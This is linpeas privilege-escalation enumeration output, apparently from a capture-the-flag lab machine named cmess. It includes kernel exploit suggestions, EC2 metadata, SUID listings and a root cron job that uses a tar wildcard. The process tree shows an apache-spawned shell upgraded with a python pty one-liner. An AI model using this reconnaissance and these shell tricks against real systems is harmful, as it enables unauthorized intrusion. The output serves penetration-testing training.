Comments: Exploit takes about ~30 minutes to run. Exploit is not reliable, see: https://cyseclabs.com/blog/cve-2016-0728-poc-not-working
╔══════════╣ Executing Linux Exploit Suggester 2
╚ https://github.com/jondonas/linux-exploit-suggester-2
[1] af_packet
CVE-2016-8655
Source: http://www.exploit-db.com/exploits/40871
[2] exploit_x
CVE-2018-14665
Source: http://www.exploit-db.com/exploits/45697
[3] get_rekt
CVE-2017-16695
Source: http://www.exploit-db.com/exploits/45010
╔══════════╣ Protections
═╣ AppArmor enabled? .............. You do not have enough privilege to read the profile set.
apparmor module is loaded.
═╣ grsecurity present? ............ grsecurity Not Found
═╣ PaX bins present? .............. PaX Not Found
═╣ Execshield enabled? ............ Execshield Not Found
═╣ SELinux enabled? ............... sestatus Not Found
═╣ Seccomp enabled? ............... disabled
═╣ AppArmor profile? .............. unconfined
═╣ User namespace? ................ enabled
═╣ Cgroup2 enabled? ............... disabled
═╣ Is ASLR enabled? ............... Yes
═╣ Printer? ....................... No
═╣ Is this a virtual machine? ..... Yes (xen)
╔═══════════╗
═══════════════════════════════════╣ Container ╠═══════════════════════════════════
╚═══════════╝
╔══════════╣ Container related tools present
╔══════════╣ Am I Containered?
╔══════════╣ Container details
═╣ Is this a container? ........... No
═╣ Any running containers? ........ No
╔═══════╗
═════════════════════════════════════╣ Cloud ╠═════════════════════════════════════
╚═══════╝
═╣ Google Cloud Platform? ............... No
═╣ AWS ECS? ............................. No
═╣ AWS EC2? ............................. Yes
═╣ AWS Lambda? .......................... No
╔══════════╣ AWS EC2 Enumeration
ami-id: ami-0ca4a09497c5052c4
instance-action: none
instance-id: i-01db65ca72c1ed35e
instance-life-cycle: on-demand
instance-type: t2.nano
region: eu-west-1
══╣ Account Info
{
"Code" : "Success",
"LastUpdated" : "2023-03-14T16:57:07Z",
"AccountId" : "739930428441"
}
══╣ Network Info
Mac: 02:09:c7:bb:bf:13/
Owner ID: 739930428441
Public Hostname:
Security Groups: AllowEverything
Private IPv4s:
Subnet IPv4: 10.10.0.0/16
PrivateIPv6s:
Subnet IPv6:
Public IPv4s:
══╣ IAM Role
══╣ User Data
╔════════════════════════════════════════════════╗
════════════════╣ Processes, Crons, Timers, Services and Sockets ╠════════════════
╚════════════════════════════════════════════════╝
╔══════════╣ Cleaned processes
╚ Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes
root 1 0.3 0.8 37852 4440 ? Ss 09:22 0:07 /sbin/init noprompt
root 199 0.0 0.4 27704 2452 ? Ss 09:22 0:01 /lib/systemd/systemd-journald
root 263 0.0 0.5 44576 2876 ? Ss 09:22 0:01 /lib/systemd/systemd-udevd
systemd+ 307 0.0 0.4 100324 2324 ? Ssl 09:22 0:00 /lib/systemd/systemd-timesyncd
└─(Caps) 0x0000000002000000=cap_sys_time
root 517 0.0 0.3 16124 1660 ? Ss 09:22 0:00 /sbin/dhclient -1 -v -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases -I -df /var/lib/dhcp/dhclient6.eth0.leases eth0
root 560 0.0 0.5 275860 2696 ? Ssl 09:23 0:00 /usr/lib/accountsservice/accounts-daemon[0m
root 565 0.0 0.4 29008 2320 ? Ss 09:23 0:00 /usr/sbin/cron -f
root 570 0.0 0.1 20096 792 ? Ss 09:23 0:00 /lib/systemd/systemd-logind
message+ 572 0.0 0.6 42896 3116 ? Ss 09:23 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
└─(Caps) 0x0000000020000000=cap_audit_write
syslog 588 0.0 0.4 256392 2396 ? Ssl 09:23 0:00 /usr/sbin/rsyslogd -n
root 632 0.0 0.3 15752 1792 ttyS0 Ss+ 09:23 0:00 /sbin/agetty --keep-baud 115200 38400 9600 ttyS0 vt220
root 633 0.0 0.3 15936 1516 tty1 Ss+ 09:23 0:00 /sbin/agetty --noclear tty1 linux
mysql 676 1.1 37.8 1136096 188576 ? Ssl 09:23 0:27 /usr/sbin/mysqld
root 683 0.0 1.1 65512 5484 ? Ss 09:23 0:00 /usr/sbin/sshd -D
root 713 0.1 4.8 303048 24316 ? Ss 09:23 0:03 /usr/sbin/apache2 -k start
www-data 949 15.3 2.7 303552 13940 ? S 09:28 5:07 _ /usr/sbin/apache2 -k start
www-data 1880 0.0 2.6 303528 13116 ? S 09:41 0:00 _ /usr/sbin/apache2 -k start
www-data 1918 0.0 2.6 303528 12948 ? S 09:41 0:00 _ /usr/sbin/apache2 -k start
www-data 1924 0.0 2.7 303764 13892 ? S 09:41 0:00 _ /usr/sbin/apache2 -k start
www-data 1925 0.0 2.6 303724 13160 ? S 09:41 0:00 _ /usr/sbin/apache2 -k start
www-data 1929 0.0 2.8 303752 14348 ? S 09:41 0:00 _ /usr/sbin/apache2 -k start
www-data 1970 0.0 2.5 303528 12892 ? S 09:41 0:00 _ /usr/sbin/apache2 -k start
www-data 1980 15.6 2.6 303940 13408 ? R 09:41 3:08 _ /usr/sbin/apache2 -k start
www-data 6567 0.0 0.1 4504 748 ? S 09:56 0:00 | _ sh -c sh
www-data 6568 0.0 0.1 4504 692 ? S 09:56 0:00 | _ sh
www-data 6569 0.1 1.7 35840 8484 ? S 09:56 0:00 | _ python3 -c import pty;pty.spawn("/bin/bash")
www-data 6570 0.0 0.6 18212 3352 pts/0 Ss 09:56 0:00 | _ /bin/bash
www-data 6574 0.4 0.4 5200 2396 pts/0 S+ 09:56 0:01 | _ /bin/sh ./linpeas.sh
www-data 10798 0.0 0.1 5200 848 pts/0 S+ 10:02 0:00 | _ /bin/sh ./linpeas.sh
www-data 10802 0.0 0.5 34556 2980 pts/0 R+ 10:02 0:00 | | _ ps fauxwww
www-data 10801 0.0 0.1 5200 848 pts/0 S+ 10:02 0:00 | _ /bin/sh ./linpeas.sh
www-data 1981 0.0 2.6 303700 13196 ? S 09:41 0:00 _ /usr/sbin/apache2 -k start
www-data 2011 0.0 2.7 303712 13940 ? S 09:41 0:00 _ /usr/sbin/apache2 -k start
root 733 0.0 4.1 266376 20784 ? Ss 09:23 0:00 php-fpm: master process (/etc/php/7.0/fpm/php-fpm.conf)
www-data 748 0.0 0.8 266376 4176 ? S 09:23 0:00 _ php-fpm: pool www
www-data 749 0.0 0.8 266376 4176 ? S 09:23 0:00 _ php-fpm: pool www
╔══════════╣ Binary processes permissions (non 'root root' and not belonging to current user)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes
╔══════════╣ Files opened by processes belonging to other users
╚ This is usually empty because of the lack of privileges to read other user processes information
COMMAND PID TID USER FD TYPE DEVICE SIZE/OFF NODE NAME
╔══════════╣ Processes with credentials in memory (root req)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#credentials-from-process-memory
gdm-password Not Found
gnome-keyring-daemon Not Found
lightdm Not Found
vsftpd Not Found
apache2 process found (dump creds from memory as root)
sshd Not Found
╔══════════╣ Cron jobs
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs
/usr/bin/crontab
incrontab Not Found
-rw-r--r-- 1 root root 805 Feb 9 2020 /etc/crontab
/etc/cron.d:
total 20
drwxr-xr-x 2 root root 4096 Feb 6 2020 .
drwxr-xr-x 89 root root 4096 Feb 13 2020 ..
-rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder
-rw-r--r-- 1 root root 670 Jun 22 2017 php
-rw-r--r-- 1 root root 191 Feb 6 2020 popularity-contest
/etc/cron.daily:
total 48
drwxr-xr-x 2 root root 4096 Feb 6 2020 .
drwxr-xr-x 89 root root 4096 Feb 13 2020 ..
-rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder
-rwxr-xr-x 1 root root 539 Jun 11 2018 apache2
-rwxr-xr-x 1 root root 1474 Oct 9 2018 apt-compat
-rwxr-xr-x 1 root root 355 May 22 2012 bsdmainutils
-rwxr-xr-x 1 root root 1597 Nov 26 2015 dpkg
-rwxr-xr-x 1 root root 372 May 5 2015 logrotate
-rwxr-xr-x 1 root root 1293 Nov 6 2015 man-db
-rwxr-xr-x 1 root root 435 Nov 17 2014 mlocate
-rwxr-xr-x 1 root root 249 Nov 12 2015 passwd
-rwxr-xr-x 1 root root 3449 Feb 26 2016 popularity-contest
/etc/cron.hourly:
total 12
drwxr-xr-x 2 root root 4096 Feb 6 2020 .
drwxr-xr-x 89 root root 4096 Feb 13 2020 ..
-rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder
/etc/cron.monthly:
total 12
drwxr-xr-x 2 root root 4096 Feb 6 2020 .
drwxr-xr-x 89 root root 4096 Feb 13 2020 ..
-rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder
/etc/cron.weekly:
total 20
drwxr-xr-x 2 root root 4096 Feb 6 2020 .
drwxr-xr-x 89 root root 4096 Feb 13 2020 ..
-rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder
-rwxr-xr-x 1 root root 86 Apr 13 2016 fstrim
-rwxr-xr-x 1 root root 771 Nov 6 2015 man-db
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/2 * * * * root cd /home/mandre/backup && tar -zcf /tmp/andre_backup.tar.gz *
╔══════════╣ Systemd PATH
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#systemd-path-relative-paths
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
╔══════════╣ Analyzing .service files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#services
/etc/systemd/system/multi-user.target.wants/networking.service is executing some relative path
/etc/systemd/system/network-online.target.wants/networking.service is executing some relative path
/lib/systemd/system/emergency.service is executing some relative path
You can't write on systemd PATH
╔══════════╣ System timers
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers
NEXT LEFT LAST PASSED UNIT ACTIVATES
Tue 2023-03-14 21:28:51 PDT 11h left Tue 2023-03-14 09:23:01 PDT 39min ago apt-daily.timer apt-daily.service
Wed 2023-03-15 06:58:49 PDT 20h left Tue 2023-03-14 09:23:01 PDT 39min ago apt-daily-upgrade.timer apt-daily-upgrade.service
Wed 2023-03-15 09:37:34 PDT 23h left Tue 2023-03-14 09:37:34 PDT 25min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
n/a n/a n/a n/a ureadahead-stop.timer ureadahead-stop.service
╔══════════╣ Analyzing .timer files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers
╔══════════╣ Analyzing .socket files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets
/etc/systemd/system/sockets.target.wants/uuidd.socket is calling this writable listener: /run/uuidd/request
/lib/systemd/system/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket
/lib/systemd/system/sockets.target.wants/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket
/lib/systemd/system/sockets.target.wants/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket
/lib/systemd/system/syslog.socket is calling this writable listener: /run/systemd/journal/syslog
/lib/systemd/system/systemd-bus-proxyd.socket is calling this writable listener: /var/run/dbus/system_bus_socket
/lib/systemd/system/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket
/lib/systemd/system/uuidd.socket is calling this writable listener: /run/uuidd/request
╔══════════╣ Unix Sockets Listening
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets
/run/dbus/system_bus_socket
└─(Read Write)
/run/mysqld/mysqld.sock
└─(Read Write)
/run/php/php7.0-fpm.sock
└─(Read Write)
/run/systemd/fsck.progress
/run/systemd/journal/dev-log
└─(Read Write)
/run/systemd/journal/socket
└─(Read Write)
/run/systemd/journal/stdout
└─(Read Write)
/run/systemd/journal/syslog
└─(Read Write)
/run/systemd/notify
└─(Read Write)
/run/systemd/private
└─(Read Write)
/run/udev/control
/run/uuidd/request
└─(Read Write)
/var/run/dbus/system_bus_socket
└─(Read Write)
/var/run/mysqld/mysqld.sock
└─(Read Write)
╔══════════╣ D-Bus config files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus
Possible weak user policy found on /etc/dbus-1/system.d/org.freedesktop.network1.conf ( <policy user="systemd-network">)
Possible weak user policy found on /etc/dbus-1/system.d/org.freedesktop.resolve1.conf ( <policy user="systemd-resolve">)
╔══════════╣ D-Bus Service Objects list
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus
NAME PID PROCESS USER CONNECTION UNIT SESSION DESCRIPTION
:1.0 1 systemd root :1.0 init.scope - -
:1.1 570 systemd-logind root :1.1 systemd-logind.service - -
:1.11 12989 busctl www-data :1.11 apache2.service - -
:1.2 560 accounts-daemon[0m root :1.2 accounts-daemon.service - -
com.ubuntu.LanguageSelector - - - (activatable) - -
org.freedesktop.Accounts 560 accounts-daemon[0m root :1.2 accounts-daemon.service - -
org.freedesktop.DBus 572 dbus-daemon[0m messagebus org.freedesktop.DBus dbus.service - -
org.freedesktop.hostname1 - - - (activatable) - -
org.freedesktop.locale1 - - - (activatable) - -
org.freedesktop.login1 570 systemd-logind root :1.1 systemd-logind.service - -
org.freedesktop.network1 - - - (activatable) - -
org.freedesktop.resolve1 - - - (activatable) - -
org.freedesktop.systemd1 1 systemd root :1.0 init.scope - -
org.freedesktop.timedate1 - - - (activatable) - -
╔═════════════════════╗
══════════════════════════════╣ Network Information ╠══════════════════════════════
╚═════════════════════╝
╔══════════╣ Hostname, hosts and DNS
cmess
127.0.0.1 localhost
127.0.1.1 cmess dev.cmess.thm
127.0.0.1 gilacms.com
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
nameserver 10.0.0.2
search eu-west-1.compute.internal
╔══════════╣ Interfaces
# symbolic names for networks, see networks(5) for more information
link-local 169.254.0.0
eth0 Link encap:Ethernet HWaddr 02:09:c7:bb:bf:13
inet addr:10.10.105.35 Bcast:10.10.255.255 Mask:255.255.0.0
inet6 addr: fe80::9:c7ff:febb:bf13/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:9001 Metric:1
RX packets:64628 errors:0 dropped:0 overruns:0 frame:0
TX packets:63262 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:4858546 (4.8 MB) TX bytes:9400313 (9.4 MB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:1619 errors:0 dropped:0 overruns:0 frame:0
TX packets:1619 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1
RX bytes:156180 (156.1 KB) TX bytes:156180 (156.1 KB)
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
╔══════════╣ Can I sniff with tcpdump?
No
╔═══════════════════╗
═══════════════════════════════╣ Users Information ╠═══════════════════════════════
╚═══════════════════╝
╔══════════╣ My user
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#users
uid=33(www-data) gid=33(www-data) groups=33(www-data)
╔══════════╣ Do I have PGP keys?
/usr/bin/gpg
netpgpkeys Not Found
netpgp Not Found
╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
╔══════════╣ Checking sudo tokens
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-tokens
ptrace protection is enabled (1)
gdb wasn't found in PATH, this might still be vulnerable but linpeas won't be able to check it
╔══════════╣ Checking Pkexec policy
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe#pe-method-2
╔══════════╣ Superusers
root:x:0:0:root:/root:/bin/bash
╔══════════╣ Users with console
andre:x:1000:1000:andre,,,:/home/andre:/bin/bash
root:x:0:0:root:/root:/bin/bash
╔══════════╣ All users & groups
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon[0m) gid=1(daemon[0m) groups=1(daemon[0m)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=100(systemd-timesync) gid=102(systemd-timesync) groups=102(systemd-timesync)
uid=1000(mandre) gid=1000(mandre) groups=1000(mandre)
uid=101(systemd-network) gid=103(systemd-network) groups=103(systemd-network)
uid=102(systemd-resolve) gid=104(systemd-resolve) groups=104(systemd-resolve)
uid=103(systemd-bus-proxy) gid=105(systemd-bus-proxy) groups=105(systemd-bus-proxy)
uid=104(syslog) gid=108(syslog) groups=108(syslog),4(adm)
uid=105(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=106(messagebus) gid=110(messagebus) groups=110(messagebus)
uid=107(uuidd) gid=111(uuidd) groups=111(uuidd)
uid=108(mysql) gid=117(mysql) groups=117(mysql)
uid=109(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
╔══════════╣ Login now
10:03:14 up 40 min, 0 users, load average: 3.04, 2.51, 1.81
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
╔══════════╣ Last logons
mandre tty1 Sun Feb 9 11:02:51 2020 - down (00:01) 0.0.0.0
reboot system boot Sun Feb 9 11:02:38 2020 - Sun Feb 9 11:04:02 2020 (00:01) 0.0.0.0
mandre tty1 Sun Feb 9 10:58:15 2020 - down (00:04) 0.0.0.0
reboot system boot Sun Feb 9 10:57:50 2020 - Sun Feb 9 11:02:24 2020 (00:04) 0.0.0.0
mandre tty1 Thu Feb 6 18:18:33 2020 - crash (2+16:39) 0.0.0.0
reboot system boot Thu Feb 6 18:18:21 2020 - Sun Feb 9 11:02:24 2020 (2+16:44) 0.0.0.0
mandre tty1 Thu Feb 6 18:01:42 2020 - crash (00:16) 0.0.0.0
reboot system boot Thu Feb 6 18:00:21 2020 - Sun Feb 9 11:02:24 2020 (2+17:02) 0.0.0.0
wtmp begins Thu Feb 6 18:00:21 2020
╔══════════╣ Last time logon each user
Username Port From Latest
mandre pts/0 10.0.0.20 Thu Feb 13 15:02:43 -0800 2020
╔══════════╣ Do not forget to test 'su' as any other user with shell: without password and with their names as password (I can't do it...)
╔══════════╣ Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!
╔══════════════════════╗
═════════════════════════════╣ Software Information ╠═════════════════════════════
╚══════════════════════╝
╔══════════╣ Useful software
/usr/bin/base64
/bin/nc
/bin/netcat
/usr/bin/perl
/usr/bin/php
/bin/ping
/usr/bin/python3
/usr/bin/sudo
/usr/bin/wget
╔══════════╣ Installed Compilers
/usr/share/gcc-5
╔══════════╣ MySQL version
mysql Ver 14.14 Distrib 5.7.29, for Linux (x86_64) using EditLine wrapper
═╣ MySQL connection using default root/root ........... No
═╣ MySQL connection using root/toor ................... No
═╣ MySQL connection using root/NOPASS ................. No
╔══════════╣ Searching mysql credentials and exec
From '/etc/mysql/mysql.conf.d/mysqld.cnf' Mysql user: user = mysql
Found readable /etc/mysql/my.cnf
!includedir /etc/mysql/conf.d/
!includedir /etc/mysql/mysql.conf.d/
╔══════════╣ Analyzing MariaDB Files (limit 70)
-rw------- 1 root root 317 Feb 6 2020 /etc/mysql/debian.cnf
╔══════════╣ Analyzing Apache-Nginx Files (limit 70)
Apache version: Server version: Apache/2.4.18 (Ubuntu)
Server built: 2019-10-08T13:31:25
httpd Not Found
Nginx version: nginx Not Found
/etc/apache2/mods-enabled/php7.0.conf-<FilesMatch ".+\.ph(p[3457]?|t|tml)$">
/etc/apache2/mods-enabled/php7.0.conf: SetHandler application/x-httpd-php
--
/etc/apache2/mods-enabled/php7.0.conf-<FilesMatch ".+\.phps$">
/etc/apache2/mods-enabled/php7.0.conf: SetHandler application/x-httpd-php-source
--
/etc/apache2/mods-available/php7.0.conf-<FilesMatch ".+\.ph(p[3457]?|t|tml)$">
/etc/apache2/mods-available/php7.0.conf: SetHandler application/x-httpd-php
--
/etc/apache2/mods-available/php7.0.conf-<FilesMatch ".+\.phps$">
/etc/apache2/mods-available/php7.0.conf: SetHandler application/x-httpd-php-source
══╣ PHP exec extensions
drwxr-xr-x 2 root root 4096 Feb 6 2020 /etc/apache2/sites-enabled
drwxr-xr-x 2 root root 4096 Feb 6 2020 /etc/apache2/sites-enabled
lrwxrwxrwx 1 root root 35 Feb 6 2020 /etc/apache2/sites-enabled/000-default.conf -> ../sites-available/000-default.conf
<VirtualHost *:80>
ServerAdmin webmaster@localhost
DocumentRoot /var/www/html
<Directory "/var/www/html">
AllowOverride All
</Directory>
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
<VirtualHost *:80>
ServerAdmin webmaster@localhost
ServerName dev.cmess.thm
DocumentRoot /var/www/dev
</VirtualHost>
-rw-r--r-- 1 root root 1516 Feb 6 2020 /etc/apache2/sites-available/000-default.conf
<VirtualHost *:80>
ServerAdmin webmaster@localhost
DocumentRoot /var/www/html
<Directory "/var/www/html">
AllowOverride All
</Directory>
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
<VirtualHost *:80>
ServerAdmin webmaster@localhost
ServerName dev.cmess.thm
DocumentRoot /var/www/dev
</VirtualHost>
lrwxrwxrwx 1 root root 35 Feb 6 2020 /etc/apache2/sites-enabled/000-default.conf -> ../sites-available/000-default.conf
<VirtualHost *:80>
ServerAdmin webmaster@localhost
DocumentRoot /var/www/html
<Directory "/var/www/html">
AllowOverride All
</Directory>
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
<VirtualHost *:80>
ServerAdmin webmaster@localhost
ServerName dev.cmess.thm
DocumentRoot /var/www/dev
</VirtualHost>
-rw-r--r-- 1 root root 70999 Jan 14 2020 /etc/php/7.0/apache2/php.ini
allow_url_fopen = On
allow_url_include = Off
odbc.allow_persistent = On
ibase.allow_persistent = 1
mysqli.allow_persistent = On
pgsql.allow_persistent = On
-rw-r--r-- 1 root root 70656 Jan 14 2020 /etc/php/7.0/cli/php.ini
allow_url_fopen = On
allow_url_include = Off
odbc.allow_persistent = On
ibase.allow_persistent = 1
mysqli.allow_persistent = On
pgsql.allow_persistent = On
-rw-r--r-- 1 root root 70999 Jan 14 2020 /etc/php/7.0/fpm/php.ini
allow_url_fopen = On
allow_url_include = Off
odbc.allow_persistent = On
ibase.allow_persistent = 1
mysqli.allow_persistent = On
pgsql.allow_persistent = On
╔══════════╣ Analyzing Rsync Files (limit 70)
-rw-r--r-- 1 root root 1044 Sep 30 2013 /usr/share/doc/rsync/examples/rsyncd.conf
[ftp]
comment = public archive
path = /var/www/pub
use chroot = yes
lock file = /var/lock/rsyncd
read only = yes
list = yes
uid = nobody
gid = nogroup
strict modes = yes
ignore errors = no
ignore nonreadable = yes
transfer logging = no
timeout = 600
refuse options = checksum dry-run
dont compress = *.gz *.tgz *.zip *.z *.rpm *.deb *.iso *.bz2 *.tbz
╔══════════╣ Analyzing Ldap Files (limit 70)
The password hash is from the {SSHA} to 'structural'
drwxr-xr-x 2 root root 4096 Feb 6 2020 /etc/ldap
╔══════════╣ Searching ssl/ssh files
Port 22
PermitRootLogin prohibit-password
PubkeyAuthentication yes
PermitEmptyPasswords no
ChallengeResponseAuthentication no
UsePAM yes
══╣ Some home ssh config file was found
/usr/share/doc/openssh-client/examples/sshd_config
AuthorizedKeysFile .ssh/authorized_keys
Subsystem sftp /usr/lib/openssh/sftp-server
══╣ /etc/hosts.allow file found, trying to read the rules:
/etc/hosts.allow
Searching inside /etc/ssh/ssh_config for interesting info
Host *
SendEnv LANG LC_*
HashKnownHosts yes
GSSAPIAuthentication yes
GSSAPIDelegateCredentials no
╔══════════╣ Analyzing PAM Auth Files (limit 70)
drwxr-xr-x 2 root root 4096 Feb 6 2020 /etc/pam.d
-rw-r--r-- 1 root root 2133 Mar 4 2019 /etc/pam.d/sshd
╔══════════╣ Analyzing Keyring Files (limit 70)
drwxr-xr-x 2 root root 4096 Feb 6 2020 /usr/share/keyrings
drwxr-xr-x 2 root root 4096 Feb 6 2020 /var/lib/apt/keyrings
╔══════════╣ Searching uncommon passwd files (splunk)
passwd file: /etc/pam.d/passwd
passwd file: /etc/passwd
passwd file: /usr/share/bash-completion/completions/passwd
passwd file: /usr/share/lintian/overrides/passwd
╔══════════╣ Analyzing PGP-GPG Files (limit 70)
/usr/bin/gpg
gpg Not Found
netpgpkeys Not Found
netpgp Not Found
-rw-r--r-- 1 root root 12255 Feb 26 2019 /etc/apt/trusted.gpg
-rw-r--r-- 1 root root 12335 May 18 2012 /usr/share/keyrings/ubuntu-archive-keyring.gpg
-rw-r--r-- 1 root root 0 May 18 2012 /usr/share/keyrings/ubuntu-archive-removed-keys.gpg
-rw-r--r-- 1 root root 2253 Nov 5 2017 /usr/share/keyrings/ubuntu-esm-keyring.gpg
-rw-r--r-- 1 root root 1139 Nov 5 2017 /usr/share/keyrings/ubuntu-fips-keyring.gpg
-rw-r--r-- 1 root root 1227 May 18 2012 /usr/share/keyrings/ubuntu-master-keyring.gpg
-rw-r--r-- 1 root root 2256 Feb 26 2016 /usr/share/popularity-contest/debian-popcon.gpg
-rw-r--r-- 1 root root 12335 Feb 26 2019 /var/lib/apt/keyrings/ubuntu-archive-keyring.gpg
╔══════════╣ Searching docker files (limit 70)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation
-rwxrwxrwx 1 root root 639 Jul 10 2019 /var/www/html/Dockerfile
╔══════════╣ Analyzing Postfix Files (limit 70)
-rw-r--r-- 1 root root 694 May 18 2016 /usr/share/bash-completion/completions/postfix
╔══════════╣ Analyzing FTP Files (limit 70)
-rw-r--r-- 1 root root 69 Jan 14 2020 /etc/php/7.0/mods-available/ftp.ini
-rw-r--r-- 1 root root 69 Jan 14 2020 /usr/share/php7.0-common/common/ftp.ini
╔══════════╣ Analyzing Interesting logs Files (limit 70)
-rw-r--r-- 1 www-data www-data 948 Mar 14 09:41 /var/www/html/log/error.log
╔══════════╣ Analyzing Windows Files (limit 70)
lrwxrwxrwx 1 root root 20 Feb 6 2020 /etc/alternatives/my.cnf -> /etc/mysql/mysql.cnf
lrwxrwxrwx 1 root root 24 Feb 6 2020 /etc/mysql/my.cnf -> /etc/alternatives/my.cnf
-rw-r--r-- 1 root root 81 Feb 6 2020 /var/lib/dpkg/alternatives/my.cnf
╔══════════╣ Analyzing Other Interesting Files (limit 70)
-rw-r--r-- 1 root root 3771 Aug 31 2015 /etc/skel/.bashrc
-rw-r--r-- 1 root root 655 May 16 2017 /etc/skel/.profile
╔═══════════════════╗
═══════════════════════════════╣ Interesting Files ╠═══════════════════════════════
╚═══════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
strings Not Found
-rwsr-xr-x 1 root root 11K May 8 2018 /usr/bin/vmware-user-suid-wrapper
-rwsr-xr-x 1 root root 40K May 16 2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 74K May 16 2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 39K May 16 2017 /usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 53K May 16 2017 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 49K May 16 2017 /usr/bin/chfn ---> SuSE_9.3/10
-rwsr-xr-x 1 root root 134K Jul 4 2017 /usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 10K Mar 27 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 419K Mar 4 2019 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 42K Jan 12 2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
